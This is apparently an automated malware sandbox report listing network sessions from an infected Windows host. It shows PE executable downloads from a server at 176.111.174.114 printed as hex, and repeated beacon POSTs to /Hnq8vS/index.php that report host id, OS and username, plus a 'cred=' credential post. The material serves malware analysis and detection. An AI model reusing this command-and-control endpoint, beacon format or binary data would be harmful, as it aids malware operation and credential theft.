                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          68176.111.174.11480192.168.2.449781C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:21.171308994 CEST4555INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          69176.111.174.11480192.168.2.449782C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:21.218883991 CEST4556INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          Last-Modified: Fri, 23 Apr 2021 10:22:18 GMT
                                                                                                                                          ETag: "37800-5c0a12ba42a80"
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 227328
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 0a 03 00 00 6a 00 00 00 00 00 00 30 19 03 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 03 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 70 03 00 3f 00 00 00 00 50 03 00 d0 12 00 00 00 b0 03 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 08 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 48 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 60 12 00 00 00 20 03 00 00 14 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 a5 0a 00 00 00 40 03 00 00 00 00 00 00 22 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 d0 12 00 00 00 50 03 00 00 14 00 00 00 22 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 3f 00 00 00 00 70 03 00 00 02 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 08 26 00 00 00 80 03 00 00 28 00 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 18 00 00 00 b0 03 00 00 18 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 00 00 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 01 07 49 6e 74 65 67 65 72 04 00 00 00 80 ff
                                                                                                                                          Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*j0 @p?P&CODEH `DATA` @BSS@".idataP"@.edata?p6@P.reloc&(8@P.rsrc`@Px@P@Integer
                                                                                                                                          Apr 28, 2021 22:59:21.218904018 CEST4558INData Raw: ff ff 7f 8b c0 1c 10 40 00 0a 06 53 74 72 69 6e 67 70 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 10 40 00 04 00 00 00 00 00 00 00 94 3a 40 00 a0 3a 40 00 a4 3a 40 00 a8 3a 40 00 9c 3a 40 00 e0
                                                                                                                                          Data Ascii: @Stringp@p@:@:@:@:@:@7@7@88@TObject|@TObjectp@System@IInterfaceFSystemD$KD$KD$K@@@
                                                                                                                                          Apr 28, 2021 22:59:21.218919039 CEST4559INData Raw: 89 5c 24 04 8b 3e 8b 7f 08 8b 2e 03 7d 0c 2b fb 89 7c 24 08 2b c8 8b 06 89 48 0c 8d 54 24 04 8b 06 e8 4d fe ff ff 84 c0 75 04 33 c0 eb 18 b0 01 eb 14 8b 06 8b 00 89 06 8b 06 3b 44 24 0c 0f 85 59 ff ff ff 33 c0 83 c4 10 5d 5f 5e 5b c3 90 53 56 57
                                                                                                                                          Data Ascii: \$>.}+|$+HT$Mu3;D$Y3]_^[SVW}sjh Vj4;t#ECuhjP3_^[SVWUCjh hU;usjh
                                                                                                                                          Apr 28, 2021 22:59:21.218935966 CEST4560INData Raw: 8b 06 83 78 0c 00 75 10 8b 06 e8 86 f9 ff ff eb 07 8b 04 24 33 d2 89 10 83 c4 18 5d 5f 5e 5b c3 90 53 83 c4 e8 8b d9 8d 88 ff 3f 00 00 81 e1 00 c0 ff ff 89 0c 24 03 d0 81 e2 00 c0 ff ff 89 54 24 04 8b 44 24 04 3b 04 24 76 5f 8b cb 8b 54 24 04 2b
                                                                                                                                          Data Ascii: xu$3]_^[S?$T$D$;$v_T$+$$L$EC]\$tL$T$nD$D$D$D$|$tT$EC3[UQ3Uh@d2d"hEC=E@CthECECCEC
                                                                                                                                          Apr 28, 2021 22:59:21.218961000 CEST4562INData Raw: 24 04 3b d0 76 0a 8d 14 2e 2b d0 e8 7b fe ff ff 8b d4 8b 44 24 08 e8 fc f4 ff ff b3 01 8b c3 83 c4 0c 5d 5f 5e 5b c3 53 56 83 c4 f4 8b da 8b f0 89 34 24 8b 04 24 89 58 08 8b 04 24 03 c3 83 e8 0c 89 58 08 81 fb 00 10 00 00 7f 76 8b c3 85 c0 79 03
                                                                                                                                          Data Ascii: $;v.+{D$]_^[SV4$$X$XvyFCTT$|$u#FC$L$$P$$D$D$$T$P$T$D$$D$$PV<|uAFCD$$FCD$D$
                                                                                                                                          Apr 28, 2021 22:59:21.218985081 CEST4563INData Raw: 04 01 1d b0 45 43 00 e8 dd 1a 00 00 eb 32 8b c3 e8 40 fd ff ff 89 45 fc 33 c0 5a 59 59 64 89 10 68 3b 25 40 00 80 3d 45 40 43 00 00 74 0a 68 c4 45 43 00 e8 f1 ed ff ff c3 e9 c7 19 00 00 eb e5 8b 45 fc 5b 8b e5 5d c3 90 55 8b ec 83 c4 f0 53 8b d8
                                                                                                                                          Data Ascii: EC2@E3ZYYdh;%@=E@CthECE[]US3EC=ECuuECE3Uh'@d2d"=E@CthEC]EEEuEC EC%)ECtSE@|
                                                                                                                                          Apr 28, 2021 22:59:21.219008923 CEST4565INData Raw: 02 33 db 8b c3 5b c3 8b 08 85 c9 74 32 85 d2 74 18 50 89 c8 ff 15 48 20 43 00 59 09 c0 74 19 89 01 c3 b0 02 e9 a6 00 00 00 89 10 89 c8 ff 15 44 20 43 00 09 c0 75 eb c3 b0 01 e9 90 00 00 00 85 d2 74 10 50 89 d0 ff 15 40 20 43 00 59 09 c0 74 e7 89
                                                                                                                                          Data Ascii: 3[t2tPH CYtD CutP@ CYt@K9t=9@3 CSV=@Ct@Cu8w3L C3^[$PRQ8YZXu1
                                                                                                                                          Apr 28, 2021 22:59:21.219029903 CEST4566INData Raw: f7 ee 50 57 8b 03 50 ff 55 0c 85 c0 75 11 e8 8e e2 ff ff e8 a9 fb ff ff 33 c0 89 45 fc eb 3f 8b 45 fc 33 d2 f7 73 08 89 45 fc 8b 45 14 85 c0 74 0a 8b 45 14 8b 55 fc 89 10 eb 23 3b 75 fc 74 1e 8b 45 08 e8 79 fb ff ff 33 c0 89 45 fc eb 0f b8 67 00
                                                                                                                                          Data Ascii: PWPUu3E?E3sEEtEU#;utEy3Egh3EE_^[Y]US]ShhD/@jd[[]SV3fCf=r/f=w)f%f=uSuS$tH@Ctg^[S:vB@
                                                                                                                                          Apr 28, 2021 22:59:21.219048977 CEST4567INData Raw: 40 9c 0c 40 00 00 00 00 00 00 50 c3 0f 40 00 00 00 00 00 00 24 f4 12 40 00 00 00 00 00 80 96 98 16 40 00 00 00 00 00 20 bc be 19 40 00 00 00 00 00 28 6b ee 1c 40 00 00 00 00 00 f9 02 95 20 40 00 00 00 00 40 b7 43 ba 23 40 00 00 00 00 10 a5 d4 e8
                                                                                                                                          Data Ascii: @@P@$@@ @(k@ @@C#@&@**@ -@1_0@4@.7@@v:k:@#>@bxA@z&D@n2xH@W?hK@N@@aQYR@oU@: 'X@x9?\
                                                                                                                                          Apr 28, 2021 22:59:21.219069004 CEST4569INData Raw: f2 8b d8 85 db 74 0d 8b d6 8b 03 e8 8d 00 00 00 84 c0 75 05 33 c0 5e 5b c3 b0 01 5e 5b c3 8d 40 00 85 c0 74 16 89 c1 8b 09 39 d1 74 0e 8b 49 dc 85 c9 75 f3 b0 0a e9 e6 f0 ff ff c3 90 57 96 eb 02 8b 36 8b 7e d0 85 ff 74 0d 0f b7 0f 51 83 c7 02 f2
                                                                                                                                          Data Ascii: tu3^[^[@t9tIuW6~tQftYvu_X)tG_PQYXtYV^uY9t@u@@@Vf2ftfsP`Xt^^aRQS|
                                                                                                                                          Apr 28, 2021 22:59:21.312570095 CEST4570INData Raw: 57 55 8b 6a 08 83 c1 05 e8 be fc ff ff ff d1 5d 5f 5e 5b b8 01 00 00 00 c3 8b c0 09 c0 75 0a b8 d8 00 00 00 e8 36 06 00 00 5a 54 55 57 56 53 50 52 54 6a 07 6a 01 68 de fa ed 0e 52 ff 25 14 40 43 00 c3 8b 44 24 30 c7 40 04 ab 3f 40 00 e8 6c 24 00
                                                                                                                                          Data Ascii: WUj]_^[u6ZTUWVSPRTjjhR%@CD$0@?@l$B`8tB1dY]_^[@#$ByZd$,1YdX]/1L$D$dUU=,t\=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          7176.111.174.11480192.168.2.449751C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:10.357990026 CEST4391INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:10 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          Last-Modified: Fri, 23 Apr 2021 10:22:14 GMT
                                                                                                                                          ETag: "1f200-5c0a12b672180"
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 127488
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 96 01 00 00 58 00 00 00 00 00 00 84 a4 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 40 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 9c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 9c 94 01 00 00 10 00 00 00 96 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 dd 09 00 00 00 d0 01 00 00 00 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 40 00 00 00 00 f0 01 00 00 02 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 9c 1d 00 00 00 00 02 00 00 1e 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 de 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 0a 06 53 74 72 69 6e 67 58 10 40 00 00 00 00
                                                                                                                                          Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*X@@@& CODE `DATA@BSS.idata&@.edata@@P.reloc@P.rsrc @P@@P@StringX@
                                                                                                                                          Apr 28, 2021 22:59:10.358016014 CEST4392INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 10 40 00 04 00 00 00 00 00 00 00 78 3b 40 00 84 3b 40 00 88 3b 40 00 8c 3b 40 00 80 3b 40 00 f8 38 40 00 14 39 40 00 50 39 40 00 07 54 4f 62 6a 65 63 74 64 10 40 00 07
                                                                                                                                          Data Ascii: X@x;@;@;@;@;@8@9@P9@TObjectd@TObjectX@System@IInterfaceFSystemD$AJD$_JD$iJ@@@F@@L@
                                                                                                                                          Apr 28, 2021 22:59:10.358041048 CEST4393INData Raw: 89 48 0c 8d 54 24 04 8b 06 e8 4d fe ff ff 84 c0 75 04 33 c0 eb 18 b0 01 eb 14 8b 06 8b 00 89 06 8b 06 3b 44 24 0c 0f 85 59 ff ff ff 33 c0 83 c4 10 5d 5f 5e 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00
                                                                                                                                          Data Ascii: HT$Mu3;D$Y3]_^[SVW}sjh Vj4;t#AuhjP3_^[SVWUCjh hU;usjh VU;t#Ae
                                                                                                                                          Apr 28, 2021 22:59:10.358064890 CEST4395INData Raw: 83 c4 18 5d 5f 5e 5b c3 90 53 83 c4 e8 8b d9 8d 88 ff 3f 00 00 81 e1 00 c0 ff ff 89 0c 24 03 d0 81 e2 00 c0 ff ff 89 54 24 04 8b 44 24 04 3b 04 24 76 5f 8b cb 8b 54 24 04 2b 14 24 8b 04 24 e8 1d fd ff ff 8d 4c 24 08 8b d3 b8 f4 d5 41 00 e8 5d f9
                                                                                                                                          Data Ascii: ]_^[S?$T$D$;$v_T$+$$L$A]\$tL$T$nD$D$D$D$|$tT$A3[UQ3Uh@d2d"hA=EAthAACA9 A/hj_
                                                                                                                                          Apr 28, 2021 22:59:10.358088017 CEST4396INData Raw: f4 ff ff b3 01 8b c3 83 c4 0c 5d 5f 5e 5b c3 53 56 83 c4 f4 8b da 8b f0 89 34 24 8b 04 24 89 58 08 8b 04 24 03 c3 83 e8 0c 89 58 08 81 fb 00 10 00 00 7f 76 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 1c d6 41 00 8b 54 82 f4 89 54 24 04 83 7c 24 04
                                                                                                                                          Data Ascii: ]_^[SV4$$X$XvyATT$|$u#A$L$$P$$D$D$$T$P$T$D$$D$$PV<|uAAD$$AD$D$$T$P$T$D$
                                                                                                                                          Apr 28, 2021 22:59:10.358109951 CEST4397INData Raw: 33 c0 5a 59 59 64 89 10 68 23 25 40 00 80 3d 45 d0 41 00 00 74 0a 68 c4 d5 41 00 e8 f1 ed ff ff c3 e9 27 19 00 00 eb e5 8b 45 fc 5b 8b e5 5d c3 90 55 8b ec 83 c4 f0 53 8b d8 33 c0 a3 c0 d5 41 00 80 3d bc d5 41 00 00 75 1f e8 da f5 ff ff 84 c0 75
                                                                                                                                          Data Ascii: 3ZYYdh#%@=EAthA'E[]US3A=AuuAE3Uh&@d2d"=EAthA]EEEuA A%)AtSE@|tAU+
                                                                                                                                          Apr 28, 2021 22:59:10.358134031 CEST4399INData Raw: 41 00 59 09 c0 74 19 89 01 c3 b0 02 e9 86 00 00 00 89 10 89 c8 ff 15 40 b0 41 00 09 c0 75 eb c3 b0 01 e9 70 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c b0 41 00 59 09 c0 74 e7 89 01 c3 8d 40 00 89 15 04 b0 41 00 e8 39 1a 00 00 c3 53 56 8b f2 8b d8 80
                                                                                                                                          Data Ascii: AYt@AuptP<AYt@A9SV=AtAu7w3HA3^[$PRQ|7YZXu1@S\7[VW|$1t+~9
                                                                                                                                          Apr 28, 2021 22:59:10.358158112 CEST4400INData Raw: 00 8d 45 fc 50 8b 43 08 f7 ee 50 57 8b 03 50 ff 55 0c 85 c0 75 11 e8 6e e2 ff ff e8 69 fb ff ff 33 c0 89 45 fc eb 3f 8b 45 fc 33 d2 f7 73 08 89 45 fc 8b 45 14 85 c0 74 0a 8b 45 14 8b 55 fc 89 10 eb 23 3b 75 fc 74 1e 8b 45 08 e8 39 fb ff ff 33 c0
                                                                                                                                          Data Ascii: EPCPWPUuni3E?E3sEEtEU#;utE93Eg(3EE_^[Y]US]ShhL/@jd[[]SV3fCf=r/f=w)f%f=uSuS$tHAtg^[fxuP
                                                                                                                                          Apr 28, 2021 22:59:10.358181000 CEST4402INData Raw: 01 d8 8a 1e 46 84 db 75 d5 fe cd 75 02 f7 d8 59 31 f6 89 32 5f 5e 5b c3 8d 40 00 56 57 89 c6 89 d7 81 e1 ff 00 00 00 f3 a6 5f 5e c3 8d 40 00 e9 03 00 00 00 c3 8b c0 53 31 db 85 c0 7c 4d 0f 84 9a 00 00 00 3d 00 14 00 00 0f 8d 81 00 00 00 89 c2 83
                                                                                                                                          Data Ascii: FuuY12_^[@VW_^@S1|M=S5@tytS6@taC_7@S=}FS5@t4tS6@tC_7@5@[
                                                                                                                                          Apr 28, 2021 22:59:10.358206034 CEST4403INData Raw: c3 87 d1 81 f9 00 00 00 ff 73 11 81 f9 00 00 00 fe 72 07 0f bf c9 03 08 ff 21 ff e1 81 e1 ff ff ff 00 01 c1 89 d0 8b 11 e9 94 20 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b d9 8b fa 8b f0 33 c0 55 68 a2 3a 40 00 64 ff 30 64 89
                                                                                                                                          Data Ascii: sr! @USVW3]3Uh:@d0d 3qE}t8E@tt$PPMEPjU ;3ZYYdh:@E_^[YY]SVCt)2;0ur;pur;
                                                                                                                                          Apr 28, 2021 22:59:10.466197014 CEST4405INData Raw: c0 59 64 89 08 58 5d e8 b7 fd ff ff ff e2 c3 31 d2 8b 4c 24 08 8b 44 24 04 83 c1 05 64 89 02 ff d1 c2 0c 00 c3 8b c0 55 8b ec 8b 55 08 8b 02 3d 92 00 00 c0 7f 2c 74 5c 3d 8e 00 00 c0 7f 15 74 57 2d 05 00 00 c0 74 5c 2d 87 00 00 00 74 3d 48 74 4e
                                                                                                                                          Data Ascii: YdX]1L$D$dUU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"%R]D$@=$AwD$PtqD$


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          70192.168.2.449783176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:21.378844976 CEST4597OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          71176.111.174.11480192.168.2.449783C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:21.483453989 CEST4653INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          72192.168.2.449784176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:21.704829931 CEST4794OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          73176.111.174.11480192.168.2.449784C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:21.816256046 CEST4795INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:21 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          74192.168.2.449785176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:22.030292034 CEST4795OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          75192.168.2.449786176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:22.038460016 CEST4796OUTPOST //Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 21
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 63 72 65 64 3d
                                                                                                                                          Data Ascii: id=152138533219&cred=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          76176.111.174.11480192.168.2.449785C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:22.131082058 CEST4796INHTTP/1.1 200 OK
